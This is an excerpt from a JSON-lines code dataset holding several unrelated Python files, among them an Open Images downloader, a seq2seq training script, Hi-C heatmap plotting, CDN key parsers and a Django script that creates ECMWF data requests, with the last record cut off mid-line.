accuracy')\r\n plt.bar(x, accuracy_train, width=w, color='g')\r\n plt.ylim(0.95,1)\r\n plt.show()\r\n plt.savefig('Final_SVM_Training_accuracy.png')\r\n plt.close()\r\n \r\n # testing accuracy\r\n print('testing accuracy')\r\n plt.bar(x, accuracy_test, width=w, color='g')\r\n plt.ylim(0.95,1)\r\n plt.show()\r\n plt.savefig('Final_SVM_Testing_accuracy.png')\r\n plt.close()\r\n \r\n return finalSVM","sub_path":"IndividualProject/final/CNN_classifier/load_finalSVM.py","file_name":"load_finalSVM.py","file_ext":"py","file_size_in_byte":3400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"147077592","text":"temp = print(\"Enter the number of current temperature bellow:\")\r\nwhile isinstance(temp, int) !=True:\r\n try: \r\n temp = int(input(\"Temperature: \"))\r\n except:\r\n print(\"Not a valid temperature!\")\r\nif temp <= 0:\r\n form = \"Solid\"\r\nelif 1 <= temp <= 99:\r\n form = \"Liquid\"\r\nelse:\r\n form = \"Gas\"\r\nprint(\"At\",str(temp)+\"°C, water will be a\",form)\r\n","sub_path":"Python/PYTHONchallenges/Python/Python/challenges/Python Tasks/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"557219833","text":"import csv\nimport subprocess\nimport os\nfrom tqdm import tqdm\nimport pandas as pd\nimport urllib.request\nfrom func_timeout import func_set_timeout\nimport time\nimport datetime\nimport func_timeout\n# import config\npicture = [\"jpg\",\"JPEG\",\"PNG\",\"png\"]\n\ndef setup_logger(log_file_path: str = None):\n import logging\n from colorlog import ColoredFormatter\n logging.basicConfig(filename=log_file_path, format='%(asctime)s %(levelname)-8s %(filename)s: %(message)s',\n # 定义输出log的格式\n datefmt='%Y-%m-%d %H:%M:%S', )\n \"\"\"Return a logger with a default ColoredFormatter.\"\"\"\n formatter = ColoredFormatter(\"%(asctime)s %(log_color)s%(levelname)-8s %(reset)s %(filename)s: %(message)s\",\n datefmt='%Y-%m-%d %H:%M:%S',\n reset=True,\n log_colors={\n 'DEBUG': 'blue',\n 'INFO': 'green',\n 'WARNING': 'yellow',\n 'ERROR': 'red',\n 'CRITICAL': 'red',\n })\n\n logger = logging.getLogger('project')\n handler = logging.StreamHandler()\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.setLevel(logging.DEBUG)\n logger.info('logger init finished')\n return logger\n\nclass open_image_dataset:\n def __init__(self):\n self.test_annotations_human = '/data/glusterfs_cv_04/public_data/imagenet/OpenImage/Human-verified_labels/test-annotations-human-imagelabels.csv'\n self.validation_annotations = '/data/glusterfs_cv_04/public_data/imagenet/OpenImage/Human-verified_labels/validation-annotations-human-imagelabels.csv'\n self.train_annotations = \"/data/glusterfs_cv_04/public_data/imagenet/OpenImage/Human-verified_labels/oidv6-train-annotations-human-imagelabels.csv\"\n\n self.Trainable = '/data/glusterfs_cv_04/public_data/imagenet/OpenImage/9600.csv'\n\n self.label_to_path = '/data/glusterfs_cv_04/public_data/imagenet/OpenImage/Image_IDs/oidv6-train-images-with-labels-with-rotation.csv'\n self.train_label_to_path_list = pd.read_csv(self.label_to_path)\n\n self.label_to_path_val = '/data/glusterfs_cv_04/public_data/imagenet/OpenImage/Image_IDs/validation-images-with-rotation.csv'\n self.val_label_to_path_list = pd.read_csv(self.label_to_path_val)\n\n self.path = \"/data/glusterfs_cv_04/public_data/imagenet/OpenImage\"\n\n self.class_descriptions = \"/data/glusterfs_cv_04/public_data/imagenet/OpenImage/oidv6-class-descriptions.csv\"\n self.class_descriptions_list = pd.read_csv(self.class_descriptions)\n\n def find_right_class(self):\n test_image_label = pd.read_csv(self.test_annotations_human)\n test_class_list = test_image_label[\"LabelName\"].unique()\n\n val_image_label = pd.read_csv(self.validation_annotations)\n val_class_list = val_image_label[\"LabelName\"].unique()\n\n train_image_label = pd.read_csv(self.train_annotations)\n train_class_list = train_image_label[\"LabelName\"].unique()\n\n Trainable_label = pd.read_csv(self.Trainable)\n Trainable_class_list = Trainable_label[\"/m/01g317\"].unique()\n\n final_class_list = list(\n set(test_class_list).intersection(val_class_list, train_class_list, Trainable_class_list))\n return final_class_list, train_image_label, val_image_label, test_image_label\n\n @func_set_timeout(50)\n def get_train_url(self,one_image_id,class_path):\n one_path = list(self.train_label_to_path_list[self.train_label_to_path_list[\"ImageID\"] == one_image_id][\n \"Thumbnail300KURL\"])[0]\n\n try:\n file_suffix = one_path.split('/')[-1]\n if file_suffix.split(\".\")[-1] not in picture:\n logger.info(\"invalid image url:\"+one_path)\n return 0\n except:\n logger.info(\"invalid image url:\"+str(one_path))\n return 0\n\n\n filename = class_path + \"/\" + file_suffix\n try:\n urllib.request.urlretrieve(one_path, filename=filename)\n except:\n logger.info(\"invalid image url:\"+one_path)\n return 0\n return 0\n\n @func_set_timeout(50)\n def get_val_url(self, one_image_id, class_path):\n one_path = list(self.val_label_to_path_list[self.val_label_to_path_list[\"ImageID\"] == one_image_id][\n \"Thumbnail300KURL\"])[0]\n\n try:\n file_suffix = one_path.split('/')[-1]\n if file_suffix.split(\".\")[-1] not in picture:\n logger.info(\"invalid image url:\" + one_path)\n return 0\n except:\n logger.info(\"invalid image url:\" + str(one_path))\n return 0\n\n filename = class_path + \"/\" + file_suffix\n try:\n urllib.request.urlretrieve(one_path, filename=filename)\n except:\n logger.info(\"invalid image url:\" + one_path)\n return 0\n return 0\n\n def download_url(self,class_path,one_class_list):\n\n for i,(one_image_id) in tqdm(enumerate(one_class_list)):\n logger.info(\" download picture\"+one_image_id)\n try:\n self.get_train_url(one_image_id,class_path)\n except func_timeout.exceptions.FunctionTimedOut:\n logger.info('Timed out!')\n continue\n\n if i > 600:\n break\n\n def download_url_val(self,class_path,one_class_list):\n\n for i,(one_image_id) in tqdm(enumerate(one_class_list)):\n logger.info(\" download picture\"+one_image_id)\n try:\n self.get_val_url(one_image_id,class_path)\n except func_timeout.exceptions.FunctionTimedOut:\n logger.info('Timed out!')\n continue\n\n if i > 50:\n break\n\n def download_train_image(self):\n class_list, train_image_label, val_image_label, test_image_label = self.find_right_class()\n logger.info(\"-------------------start download train data------------------\")\n logger.info(\" class number: {:.1f}\".format(len(class_list)))\n for class_one in class_list:\n DisplayName = \\\n list(self.class_descriptions_list[self.class_descriptions_list[\"LabelName\"] == class_one][\"DisplayName\"])[0]\n logger.info(\"-------------------start download new class------------------\")\n logger.info(\" LabelName: \"+class_one+\" DisplayName:\"+DisplayName)\n\n same_class = train_image_label[train_image_label[\"LabelName\"] == class_one]\n confidence = same_class[same_class[\"Source\"] == \"verification\"]\n one_class_list_clean = list(confidence[confidence[\"Confidence\"] == 1][\"ImageID\"])\n one_class_list_noise = list(confidence[confidence[\"Confidence\"] == 0][\"ImageID\"])\n if len(one_class_list_clean)>2000:\n logger.info(\" warning: invalid class\")\n continue\n\n logger.info(\" all sample number : {:.1f}\".format(len(confidence[\"ImageID\"])))\n logger.info(\" Clean sample number : {:.1f}\".format(len(one_class_list_clean))+\" Noise sample number: {:.1f}\".format(len(one_class_list_noise)))\n\n # one_class_list = list(train_image_label[train_image_label[\"LabelName\"] == class_one][\"ImageID\"])\n logger.info(\"-------------------start download clean dataset------------------\")\n class_path = os.path.join(self.path, \"train\",\"clean\", class_one.split(\"/\")[-1])\n if not os.path.exists(class_path):\n os.makedirs(class_path)\n else:\n continue\n self.download_url(class_path,one_class_list_clean)\n\n logger.info(\"-------------------start download noise dataset------------------\")\n class_path = os.path.join(self.path, \"train\",\"noise\", class_one.split(\"/\")[-1])\n if not os.path.exists(class_path):\n os.makedirs(class_path)\n else:\n continue\n self.download_url(class_path, one_class_list_noise)\n\n def download_val_image(self):\n class_list, train_image_label, val_image_label, test_image_label = self.find_right_class()\n logger.info(\"-------------------start download val data------------------\")\n logger.info(\" class number: {:.1f}\".format(len(class_list)))\n\n class_path = os.path.join(self.path, \"train\", \"clean\")\n train_class_list = os.listdir(class_path)\n for class_one in class_list:\n\n if class_one.split(\"/\")[-1] not in train_class_list:\n continue\n\n DisplayName = \\\n list(self.class_descriptions_list[self.class_descriptions_list[\"LabelName\"] == class_one][\"DisplayName\"])[0]\n logger.info(\"-------------------start download new class------------------\")\n logger.info(\" LabelName: \"+class_one+\" DisplayName:\"+DisplayName)\n\n same_class = val_image_label[val_image_label[\"LabelName\"] == class_one]\n confidence = same_class[same_class[\"Source\"] == \"verification\"]\n one_class_list_clean = list(confidence[confidence[\"Confidence\"] == 1][\"ImageID\"])\n\n logger.info(\" all sample number : {:.1f}\".format(len(confidence[\"ImageID\"])))\n logger.info(\" Clean sample number : {:.1f}\".format(len(one_class_list_clean)))\n\n logger.info(\"-------------------start download dataset------------------\")\n class_path = os.path.join(self.path, \"val\", class_one.split(\"/\")[-1])\n if not os.path.exists(class_path):\n os.makedirs(class_path)\n else:\n continue\n self.download_url_val(class_path,one_class_list_clean)\n\n\n\nlogger = setup_logger(os.path.join(\"/data/glusterfs_cv_04/11121171/AAAI_NL/Baseline_classification/classification_open_image/datasets\", 'train_val_log'))\ndataset=open_image_dataset()\ndataset.download_val_image()\n\n","sub_path":"datasets/download_openimage_eval.py","file_name":"download_openimage_eval.py","file_ext":"py","file_size_in_byte":10234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"72935370","text":"from new_data_prep import remove_cols, ids_columns, prep_data, load_train, load_test, find_statistics\n\nprep_data()\nX = load_train()\nprint(len(X.columns))\n#remove_cols(ids_columns, 'no_ids.csv'\n\n# train_df = load_train()\n# test_df = load_test()\n# tr, test = find_statistics('district_id', train_df, test_df)\n\n\nfor nn in X.columns:\n z = X[nn]\n print(f'{nn}: max = {z.max()} min = {z.min()} uniq = {len(z.unique())}')","sub_path":"new_ufek.py","file_name":"new_ufek.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"548331021","text":"import cooler\r\nimport sys\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\n\r\nclr = cooler.Cooler(sys.argv[1])\r\n# clr = cooler.Cooler('XXtrans.cool')\r\nchrom_sizes_bins=(clr.chromsizes // clr.binsize).tolist()\r\nchrom_size_matrix = [ [0]*24 for i in range(24) ]\r\nfor i in range(24):\r\n for j in range(24):\r\n chrom_size_matrix[i][j] = chrom_sizes_bins[i]*chrom_sizes_bins[j]\r\ndf_chrom_size_matrix = pd.DataFrame(data=chrom_size_matrix)\r\nmtx = clr.matrix(balance=True, as_pixels=True, join=True)\r\nmtx = pd.DataFrame(data=clr.matrix(balance=True, as_pixels=True, join=True)[:,:])\r\nmtx['balanced'] = mtx['balanced'].fillna(value=0)\r\nmtx = mtx.drop(columns=['start1','end1','start2','end2','count'])\r\ntrans_contacts = mtx[mtx['chrom1'] != mtx['chrom2']]\r\nsum = trans_contacts.groupby(by=['chrom1','chrom2']).sum()\r\nsum.to_csv(sys.argv[1] + '.csv')\r\nsum = pd.read_csv(sys.argv[1] + '.csv')\r\n# sum = pd.read_csv('XXtrans.cool' + '.csv')\r\nnew_indexes=['chr1','chr2', 'chr3', 'chr4', 'chr5','chr6','chr7','chr8','chr9','chr10','chr11','chr12','chr13','chr14',\r\n'chr15','chr16','chr17','chr18','chr19','chr20','chr21','chr22','chrX','chrY']\r\nsum = sum.pivot(index='chrom1',columns='chrom2')\r\nsum.columns= sum.index\r\nsum = sum.where(sum!=0, sum.T)\r\nsum = sum.reindex(index=new_indexes,columns=new_indexes)\r\nsum = pd.DataFrame(sum.values/df_chrom_size_matrix.values, columns=new_indexes, index=new_indexes)\r\nsum.to_csv(sys.argv[1] + '.csv')\r\nplt.cla()\r\nfig = sns.heatmap(data=sum,cmap='Reds')\r\nfig.figure.savefig(sys.argv[1] + '.png')\r\n","sub_path":"get_sparce.py","file_name":"get_sparce.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"568752405","text":"#! /usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\n @Author: ShiLou\n @Time: 上午10:20\n @Description: \n\"\"\"\nfrom __future__ import print_function, division\nimport tensorflow as tf\nimport ConfigParser\nimport numpy as np\nfrom src.conv2seq_model import Conv2Model\nfrom src.seq2seq_model import Seq2SeqModel\nfrom src.data_helper import DataHelper\n# from src.units import Units\n# from pyrouge import Rouge155\n# from src.ROUGE import PythonROUGE\nimport os\nimport time\n\n\n# units = Units()\n\ndef build_flag():\n config = ConfigParser.ConfigParser()\n config.read('config.ini')\n tf.flags.DEFINE_integer('batch_size', config.get('MODEL', 'batch_size'), 'size of one batch')\n tf.flags.DEFINE_integer('max_box_len', config.get('MODEL', 'max_box_len'), 'maximum length of fields and values')\n tf.flags.DEFINE_integer('max_sum_len', config.get('MODEL', 'max_sum_len'), 'maximum length of summaries')\n tf.flags.DEFINE_integer('hidden_size', config.get('MODEL', 'hidden_size'), 'size of hidden layer')\n tf.flags.DEFINE_string('filter_sizes', config.get('MODEL', 'filter_sizes'), 'size of convolution kernels')\n tf.flags.DEFINE_integer('filter_nums', config.get('MODEL', 'filter_nums'), 'convolution kernel number')\n tf.flags.DEFINE_float('lr', config.get('MODEL', 'learning_rate'), 'learning rate')\n tf.flags.DEFINE_float('clip_grads', config.get('MODEL', 'clip_grads'), 'gradient clip coefficient')\n tf.flags.DEFINE_integer('epoch_nums', config.get('MODEL', 'epoch_nums'), 'numbers of epoch')\n tf.flags.DEFINE_integer('batch_print', config.get('MODEL', 'batch_print'), 'print per X batch.')\n tf.flags.DEFINE_integer('vocab_size', config.get('EMBEDDING', 'vocab_size'), 'vocabulary size')\n tf.flags.DEFINE_integer('vocab_ex', config.get('EMBEDDING', 'vocab_ex'), 'size of vocabulary with content words.')\n tf.flags.DEFINE_integer('vocab_dim', config.get('EMBEDDING', 'vocab_dim'), 'vocab embedding dimension')\n tf.flags.DEFINE_integer('field_size', config.get('EMBEDDING', 'field_size'), 'field table size')\n tf.flags.DEFINE_integer('field_dim', config.get('EMBEDDING', 'field_dim'), 'field embedding dimension')\n tf.flags.DEFINE_string('checkpointDir', 'model/model', 'checkpoint path')\n tf.flags.DEFINE_boolean('field', config.getboolean('EMBEDDING', 'field'), 'whether to use field embedding or not')\n tf.flags.DEFINE_string('mode', config.get('MODEL', 'mode'), 'train, predict, test or debug mode with little data.')\n tf.flags.DEFINE_integer('att_size', config.getint('MODEL', 'att_size'), 'hidden size of attention layer.')\n tf.flags.DEFINE_integer('epoch_dev', config.getint('MODEL', 'epoch_dev'), 'epoch numbers of development.')\n tf.flags.DEFINE_integer('seed', config.getint('MODEL', 'seed'), 'random seed, set 0 to do not use.')\n tf.flags.DEFINE_integer('pad', 0, 'id of \"\" in the vocabulary, DO NOT MODIFY!')\n tf.flags.DEFINE_integer('cnn', config.getboolean('MODEL', 'cnn'), 'Use cnn_state as extra decoder input.')\n tf.flags.DEFINE_float('dropout', config.getfloat('MODEL', 'dropout'), 'CNN dropout rate.')\n tf.flags.DEFINE_boolean('attention', config.getboolean('MODEL', 'attention'), 'If use attention, set it be True.')\n tf.flags.DEFINE_string('tables', None, 'ODPS tables.')\n return tf.flags.FLAGS\n\n\nFLAGS = build_flag()\n\n\n# def evaluate():\n# r = Rouge155()\n# # set directories\n# r.system_dir = 'to_evaluate/hypothesis/'\n# r.model_dir = 'to_evaluate/reference/'\n#\n# # define the patterns\n# r.system_filename_pattern = 'hypothesis_test_(\\d+).txt'\n# r.model_filename_pattern = 'reference_test_#ID#.txt'\n#\n# # use default parameters to run the evaluation\n# output = r.convert_and_evaluate()\n# print(output)\n# output_dict = r.output_to_dict(output)\n# print(output_dict['rouge_4_f_score'])\n\n\ndef debug():\n model = Seq2SeqModel(FLAGS)\n if FLAGS.cnn:\n cnn_max_len = FLAGS.max_box_len\n else:\n cnn_max_len = None\n dh = DataHelper(FLAGS.vocab_size, FLAGS.vocab_ex, FLAGS.field_size,\n mode=FLAGS.mode, cnn_max_len=cnn_max_len,\n tables=FLAGS.tables)\n dh.create_batch(batch_size=FLAGS.batch_size,\n max_box_len=FLAGS.max_box_len,\n max_sum_len=FLAGS.max_sum_len)\n\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n\n # remove old tensorboard log.\n # all_files = os.listdir('model_log')\n # for f in all_files:\n # if f.startswith('events.out.tfevents.'):\n # os.remove(os.path.join(os.path.abspath('model_log'), f))\n\n with tf.Session(config=config) as sess:\n # writer = tf.summary.FileWriter('model_log/', sess.graph)\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver()\n\n vars = tf.all_variables()\n print(\"all trainable variables: \")\n for v in vars:\n print(v)\n\n for epoch in range(FLAGS.epoch_nums):\n sess.graph.finalize()\n print('===========================epoch %d===========================' % epoch)\n batch_loss = 0\n for i in range(dh.batch_num):\n batch = dh.next_batch()\n oov_dic_rev = batch['oov_dic_rev']\n # batch_loss += model.summary(sess, batch, i, writer)\n batch_loss += model.train(sess, batch)\n\n if i == 0:\n print('===========================print===========================')\n g = model.generate(sess, batch)\n content_to_word = []\n for x in batch['content_in'][0]:\n if x in oov_dic_rev and oov_dic_rev[x] == '':\n break\n elif x in oov_dic_rev:\n content_to_word.append(oov_dic_rev[x])\n else:\n content_to_word.append(oov_dic_rev[''])\n\n content_in = reduce(lambda x, y: x + ' ' + y, content_to_word)\n\n syn_to_word = map(lambda x: oov_dic_rev[x] if x in oov_dic_rev else oov_dic_rev[''],\n g[0])\n syn = reduce(lambda x, y: x + ' ' + y, syn_to_word)\n ref = batch['summary'][0]\n print('Content in:\\n%s\\nRef:\\n%s\\nSyn:\\n%s\\n'\n % (content_in, ref, syn))\n oov_words = [oov_dic_rev[x]\n for x in g[0]\n if x >= FLAGS.vocab_size and x < FLAGS.vocab_ex]\n print('OOV words: %s ' % oov_words)\n\n if i > 0 and i % FLAGS.batch_print == 0:\n print('%s\\t[epoch-%d batch-%d]\\tloss: %.4f'\n % (time.strftime('%m.%d %H:%M:%S', time.localtime()),\n epoch, i, batch_loss / FLAGS.batch_print))\n batch_loss = 0\n\n saver.save(sess, FLAGS.checkpointDir)\n print('saved.')\n\n\nif __name__ == '__main__':\n if FLAGS.mode.lower() == 'debug':\n debug()\n elif FLAGS.mode.lower() == 'train':\n train_model()\n elif FLAGS.mode.lower() == 'test':\n evaluate()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"580258759","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport neural_network_from_scratch as nnfs\n\niter = 100\nX = np.array([[0, 0, 1],\n [0, 1, 1],\n [1, 0, 1],\n [1, 1, 1]])\ny = np.array([[1], [.5], [1], [.8]])\nnn = nnfs.NeuralNetwork(X, y)\nLoss = np.zeros((iter))\nfor i in range(iter):\n nn.feedforward()\n nn.backprop()\n Loss[i] = abs(nn.output[0] - nn.y[0])\n\nyp = np.round(nn.output, 4)\nxyyp = np.concatenate((X, y, yp), axis=1)\ncolumns = ('X1', 'X2', 'X3', 'Y', 'Yp')\nxy = np.concatenate((X, y, yp), axis=1)\nfig, (ax1, ax2) = plt.subplots(nrows=2, figsize=(6, 5.4))\ntprw = [\"#0000ff\", \"#0000ff\", \"#0000ff\", \"#009933\"]\ndrw = [\"#6699ff\", \"#6699ff\", \"#6699ff\", \"#66ff33\", \"#66ff33\"]\nlrw = [\"#6699ff\", \"#6699ff\", \"#6699ff\", \"#99ff66\", \"#99ff66\"]\ncolors = [lrw, drw, lrw, drw]\n\nthe_table = ax1.table(cellText=xy, cellColours=colors,\n colLabels=columns, loc='center')\nthe_table.set_fontsize(16)\nthe_table.scale(1, 2)\nax2.plot(Loss)\nax2.set_title('Loss after '+str(iter)+' iterations')\nplt.tight_layout()\nplt.savefig(str(iter)+'iter_complex.png')\n","sub_path":"ToyNeuralNetwork/PlaywithNN_complex.py","file_name":"PlaywithNN_complex.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"450756501","text":"from typing import List, Tuple\n\nfrom app.models.public import AboutAllModel\n\ndef get_specific_keys_from_content_list(content_list, **kwargs) -> List:\n '''\n Accept raw list of content\n Return list with only speficic keys\n \n Available keys:\n 'Key'\n 'LastModified'\n 'ETag'\n 'Size'\n 'StorageClass'\n '''\n\n object_data = {}\n parsed = []\n for content in content_list:\n for key, value in kwargs.items():\n if value == True:\n object_data[key] = content[key]\n parsed.append(object_data)\n object_data = {}\n \n return parsed\n\n\ndef get_names_from_keys(content_list) -> List:\n '''\n Accepts\n List of Dicts:\n [{\n Key: \"some/key/here/image.jpg\"\n }]\n\n Returns:\n Dict:\n {\n \"some/key/here/image.jpg\" : \"image.jpg\"\n }\n '''\n\n parsed = {}\n for content in content_list:\n name = content['Key'].split('/')[-1]\n if '.' in name:\n parsed[content['Key']] = name\n\n return parsed\n\ndef get_order_from_keys(content_list) -> Tuple:\n '''\n Accepts\n List of Dicts:\n [{\n Key: \"some/key/here/0001.jpg\"\n }]\n\n Returns:\n Tuple(\n Dict:\n {\n \"some/key/here/0001.jpg\" : 1\n }\n List:\n Dict: \n {\n 'Key': \"some/key/here/image.jpg\"\n }\n )\n '''\n\n parsed = {}\n delete = {}\n for_deletion = []\n for content in content_list:\n name = content['Key'].split('/')[-1]\n if '.' in name:\n try:\n parsed[content['Key']] = int(name.split('.')[0])\n except:\n delete['Key'] = content['Key'] \n for_deletion.append(delete)\n delete = {}\n\n return (parsed, for_deletion)\n\ndef filter_prefix(prefix, content_list, exclude_root=True) -> List:\n '''\n Filters list of elements by prefix\n\n :params:\n prefix - prefix to filter by\n content_list - list to filter\n exclude_root: True - exclude root directory\n\n Returns list of Dict:\n [\n {\n 'Key' : 'object_key_in_cdn'\n }\n ]\n '''\n filtered = []\n prefix = prefix if prefix[-1] == '/' else prefix + '/'\n for content in content_list:\n if prefix in content['Key']:\n if not exclude_root:\n filtered.append(content)\n elif prefix != content['Key']:\n filtered.append(content)\n\n return filtered\n\n\ndef list_root_directory_files(prefix, content_list, exclude_root=True, exclude_files=[]) -> List:\n '''\n Return only files from directory\n\n :params:\n prefix - directory prefix to filter\n content_list - list to filter\n exclude_root: True - exclude directory itself\n exclude_files: List of filed to be excluded by key\n Returns list of Dict:\n [\n {\n 'Key' : 'object_key_in_cdn'\n }\n ]\n '''\n filtered = []\n prefix = prefix if prefix[-1] == '/' else prefix + '/'\n \n for content in content_list:\n if prefix in content['Key'] and prefix != content['Key']:\n if '/' not in content['Key'].split(prefix)[1]:\n if content['Key'] not in exclude_files:\n filtered.append(content)\n elif not exclude_files:\n filtered.append(content)\n\n if not exclude_root:\n filtered.append({\"Key\": prefix})\n\n return filtered\n\n\ndef check_key_exists_in_list_of_objects(key, list_of_objects) -> bool:\n\n for object_key in list_of_objects:\n if key == object_key['Key']:\n return True\n\n print(f\"Didn't find key {key} in \\n {list_of_objects}\") \n return False\n\ndef get_prefix_by_inner_key(key: str) -> str:\n\n sufix = key.split(\"/\")[-1]\n \n return key.replace(sufix, '')\n\ndef about_keys_from_list_of_objects(list_: List[AboutAllModel]):\n list_of_keys = [{\"Key\": about_object.background_key} for about_object in list_]\n\n return list_of_keys\n","sub_path":"backend/server/app/cloud/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"509364064","text":"from api.mms.mms_ import Mms\n\n\nclass AgreeRefundV2(Mms):\n method = 'post'\n api = '/api/aftersale/agreeRefundV2'\n data = {\n \"order_id\": \"1631439211248795650\",\n \"refund_desc\": \"\"\n }\n\n error_resp = {\n 'code': 400000,\n 'message': '没有可以购买的商品'\n }\n\n expected_schema = {\n \"$schema\": \"http://json-schema.org/draft-06/schema\",\n \"type\": \"object\",\n \"title\": \"The root schema\",\n \"required\": [\n \"code\",\n \"payload\"\n ],\n \"properties\": {\n \"code\": {\n \"type\": \"integer\",\n \"title\": \"The code schema\"\n },\n \"payload\": {\n \"type\": \"object\",\n \"title\": \"The payload schema\",\n \"required\": [\n \"order_id\",\n \"refund_status\"\n ],\n \"properties\": {\n \"order_id\": {\n \"type\": \"string\",\n \"title\": \"The order_id schema\"\n },\n \"refund_status\": {\n \"type\": \"integer\",\n \"title\": \"The refund_status schema\"\n }\n }\n }\n }\n }\n","sub_path":"banshee-master/api/mms/refund/agree_refund.py","file_name":"agree_refund.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"154377414","text":"#!/usr/bin/env python\n\"\"\"\nupdate_dreqs_0103.py\n\nThis file adds all existing ECMWF data requests to the following:\nECMWF-IFS-MR hist-1950 r2i1p1f1\nECMWF-IFS-MR hist-1950 r3i1p1f1\n\nECMWF-IFS-HR hist-1950 r5i1p1f1\nECMWF-IFS-HR hist-1950 r6i1p1f1\n\nECMWF-IFS-HR highresSST-present r2i1p1f1\nECMWF-IFS-HR highresSST-present r3i1p1f1\nECMWF-IFS-HR highresSST-present r4i1p1f1\nECMWF-IFS-HR highresSST-present r5i1p1f1\nECMWF-IFS-HR highresSST-present r6i1p1f1\n\nECMWF-IFS-LR hist-1950 r2i1p1f1\nECMWF-IFS-LR hist-1950 r3i1p1f1\nECMWF-IFS-LR hist-1950 r4i1p1f1\nECMWF-IFS-LR hist-1950 r5i1p1f1\nECMWF-IFS-LR hist-1950 r6i1p1f1\nECMWF-IFS-LR hist-1950 r7i1p1f1\nECMWF-IFS-LR hist-1950 r8i1p1f1\n\nECMWF-IFS-LR highresSST-present r2i1p1f1\nECMWF-IFS-LR highresSST-present r3i1p1f1\nECMWF-IFS-LR highresSST-present r4i1p1f1\nECMWF-IFS-LR highresSST-present r5i1p1f1\nECMWF-IFS-LR highresSST-present r6i1p1f1\nECMWF-IFS-LR highresSST-present r7i1p1f1\nECMWF-IFS-LR highresSST-present r8i1p1f1\n\"\"\"\nimport argparse\nimport logging.config\nimport os\nimport sys\n\nfrom cf_units import date2num, CALENDAR_GREGORIAN\n\nimport django\ndjango.setup()\nfrom pdata_app.models import ClimateModel, DataRequest, Experiment\nfrom pdata_app.utils.common import delete_drs_dir\n\n__version__ = '0.1.0b1'\n\nDEFAULT_LOG_LEVEL = logging.WARNING\nDEFAULT_LOG_FORMAT = '%(levelname)s: %(message)s'\n\nlogger = logging.getLogger(__name__)\n\n\ndef delete_files(query_set):\n \"\"\"\n Delete any files online from the specified queryset\n \"\"\"\n directories_found = []\n for df in query_set:\n if df.online:\n try:\n os.remove(os.path.join(df.directory, df.name))\n except OSError as exc:\n logger.error(str(exc))\n sys.exit(1)\n else:\n if df.directory not in directories_found:\n directories_found.append(df.directory)\n df.online = False\n df.directory = None\n df.save()\n\n for directory in directories_found:\n if not os.listdir(directory):\n delete_drs_dir(directory)\n logger.debug('{} directories removed'.format(len(directories_found)))\n\n\ndef parse_args():\n \"\"\"\n Parse command-line arguments\n \"\"\"\n parser = argparse.ArgumentParser(description='Add additional data requests')\n parser.add_argument('-l', '--log-level', help='set logging level to one of '\n 'debug, info, warn (the default), or error')\n parser.add_argument('--version', action='version',\n version='%(prog)s {}'.format(__version__))\n args = parser.parse_args()\n\n return args\n\n\ndef main(args):\n \"\"\"\n Main entry point\n \"\"\"\n # MR hist-1950\n for var_lab in ['r{}i1p1f1'.format(i) for i in range(2, 4)]:\n data_reqs = DataRequest.objects.filter(\n climate_model__short_name='ECMWF-IFS-MR',\n experiment__short_name='hist-1950',\n rip_code='r1i1p1f1'\n )\n num_created = 0\n for data_req in data_reqs:\n data_req.id = None\n data_req.rip_code = var_lab\n data_req.save()\n num_created += 1\n logger.debug('{} MR hist-1950 {} data requests created.'.\n format(num_created, var_lab))\n\n # HR hist-1950\n for var_lab in ['r{}i1p1f1'.format(i) for i in range(5, 7)]:\n data_reqs = DataRequest.objects.filter(\n climate_model__short_name='ECMWF-IFS-HR',\n experiment__short_name='hist-1950',\n rip_code='r1i1p1f1'\n )\n num_created = 0\n for data_req in data_reqs:\n data_req.id = None\n data_req.rip_code = var_lab\n data_req.save()\n num_created += 1\n logger.debug('{} HR hist-1950 {} data requests created.'.\n format(num_created, var_lab))\n\n # HR highresSST-present\n for var_lab in ['r{}i1p1f1'.format(i) for i in range(2, 7)]:\n data_reqs = DataRequest.objects.filter(\n climate_model__short_name='ECMWF-IFS-HR',\n experiment__short_name='highresSST-present',\n rip_code='r1i1p1f1'\n )\n num_created = 0\n for data_req in data_reqs:\n data_req.id = None\n data_req.rip_code = var_lab\n data_req.save()\n num_created += 1\n logger.debug('{} HR highresSST-present {} data requests created.'.\n format(num_created, var_lab))\n\n # LR hist-1950\n for var_lab in ['r{}i1p1f1'.format(i) for i in range(2, 9)]:\n data_reqs = DataRequest.objects.filter(\n climate_model__short_name='ECMWF-IFS-LR',\n experiment__short_name='hist-1950',\n rip_code='r1i1p1f1'\n )\n num_created = 0\n for data_req in data_reqs:\n data_req.id = None\n data_req.rip_code = var_lab\n data_req.save()\n num_created += 1\n logger.debug('{} LR hist-1950 {} data requests created.'.\n format(num_created, var_lab))\n\n # LR highresSST-present\n for var_lab in ['r{}i1p1f1'.format(i) for i in range(2, 9)]:\n data_reqs = DataRequest.objects.filter(\n climate_model__short_name='ECMWF-IFS-LR',\n experiment__short_name='highresSST-present',\n rip_code='r1i1p1f1'\n )\n num_created = 0\n for data_req in data_reqs:\n data_req.id = None\n data_req.rip_code = 